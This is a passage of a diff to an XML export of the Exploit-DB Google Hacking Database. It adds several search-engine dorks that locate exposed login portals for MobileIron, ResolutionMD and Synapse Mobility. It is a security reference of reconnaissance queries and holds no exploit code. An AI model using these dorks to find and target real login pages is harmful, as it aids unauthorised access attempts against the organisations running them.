  <link>https://www.exploit-db.com/ghdb/8125</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>allintitle:&quot;MobileIron User Portal: Sign In&quot;</shortDescription>
  <textualDescription># Google Dork: allintitle:&quot;MobileIron User Portal: Sign In&quot;
 # Pages Containing Login Portals
 # Date:29/03/2023
 # Exploit Author: Heverin Hacker</textualDescription>
  <query>allintitle:&quot;MobileIron User Portal: Sign In&quot;</query>
  <querystring>https://www.google.com/search?q=allintitle:&quot;MobileIron User Portal: Sign In&quot;</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Heverin Hacker</author>
 </entry>
 <entry>
  <id>8092</id>
  <link>https://www.exploit-db.com/ghdb/8092</link>
@ -68054,6 +68129,21 @@ Author: Sibi Mathew George
  <date>2023-02-27</date>
  <author>GirlsLearnCyber</author>
 </entry>
 <entry>
  <id>8127</id>
  <link>https://www.exploit-db.com/ghdb/8127</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>allintitle:&quot;ResolutionMD Login&quot;</shortDescription>
  <textualDescription># Google Dork: allintitle:&quot;ResolutionMD Login&quot;
 # Pages Containing Login Portals
 # Date:29/03/2023
 # Exploit Author: Heverin Hacker</textualDescription>
  <query>allintitle:&quot;ResolutionMD Login&quot;</query>
  <querystring>https://www.google.com/search?q=allintitle:&quot;ResolutionMD Login&quot;</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Heverin Hacker</author>
 </entry>
 <entry>
  <id>8095</id>
  <link>https://www.exploit-db.com/ghdb/8095</link>
@ -68069,6 +68159,21 @@ Author: Sibi Mathew George
  <date>2023-02-27</date>
  <author>GirlsLearnCyber</author>
 </entry>
 <entry>
  <id>8126</id>
  <link>https://www.exploit-db.com/ghdb/8126</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>allintitle:&quot;Synapse Mobility Login&quot;</shortDescription>
  <textualDescription># Google Dork: allintitle:&quot;Synapse Mobility Login&quot;
 # Pages Containing Login Portals
 # Date:29/03/2023
 # Exploit Author: Heverin Hacker</textualDescription>
  <query>allintitle:&quot;Synapse Mobility Login&quot;</query>
  <querystring>https://www.google.com/search?q=allintitle:&quot;Synapse Mobility Login&quot;</querystring>
  <edb></edb>
  <date>2023-03-29</date>
  <author>Heverin Hacker</author>
 </entry>
 <entry>
  <id>8091</id>
  <link>https://www.exploit-db.com/ghdb/8091</link>